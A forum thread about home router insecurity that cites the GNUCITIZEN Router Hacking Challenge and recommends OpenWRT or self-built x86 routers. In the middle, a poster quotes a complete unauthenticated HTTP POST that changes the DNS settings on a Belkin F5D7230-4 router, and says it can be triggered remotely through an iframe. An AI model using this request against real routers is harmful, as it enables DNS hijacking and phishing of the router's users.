No. 1 reason to build your own router / reflash it with linux

[Impotence]

Router Hacking Challenge | GNUCITIZEN

Just having a quick glance over that page has shattered any confidence i had left in embedded devices (more specifically home routers).

Alot of the methods described can be done remotely (with scripts embedded into html pages on compromised servers / malicious sites etc) and would allow an attack to change DNS settings (to a DNS server they control).

If you control someones DNS results, then you control the content that there browser loads! (for example, send them the IP of another machine you control with a clone of there banks website hosted on it when they request what-ever-there-bank-is.com).

 

[Addis]

What about power usage compared to embedded devices?

Haven't read through all of that, how does changing the DNS settings work if you're not logged in to the router?

 

[Impotence]

Here's a good example

I now have managed to change router configuration options without even logging in. If I try to access the html pages of the router it will ask for a password,but not the script that handles the request itself.So we just need to replay the http packets that actually perform the action.

*No* authentication or spoofing is required.

HTTP headers:

POST /cgi-bin/setup_dns.exe
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://192.168.2.1/setup_dns.stm
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

HTTP body:
page=setup_dns&logout=&dns1_1=1&dns1_2=1&dns1_3=1&dns1_4=1&dns2_1=2&dns2_2=2&dns2_3=2&dns2_4=2

After sending this the primary DNS server IP-address will get changed to 1.1.1.1 and secondary DNS server to 2.2.2.2 . I have tried changing other options without password and it worked all the time,disable firewall,reset to factory defaults,etc.. The page will still ask for a password…too bad the script didn’t.This can obviously be triggered remotely for at least a couple of ways.

belkin.html:
Belkin Wireless G router F5D7230-4 Hole

we can load in an iframe for example:
page1.html

Tomorrow i will be bying a new router.

You can build very low power x86 computers, THIS mobo for example only draws 14W (and with a second network card or ADSL modem, some ram and a small SSD you have a low power router)

You can install Linux (openWRT etc) on quite a few home routers... I have openWRT running on a WRT54G (v2.2) acting as a wireless client with NAT to share the connection to the machines on the wired side (the other benefit of not using the default firmware, you cant do this with the default WRT54G firmware)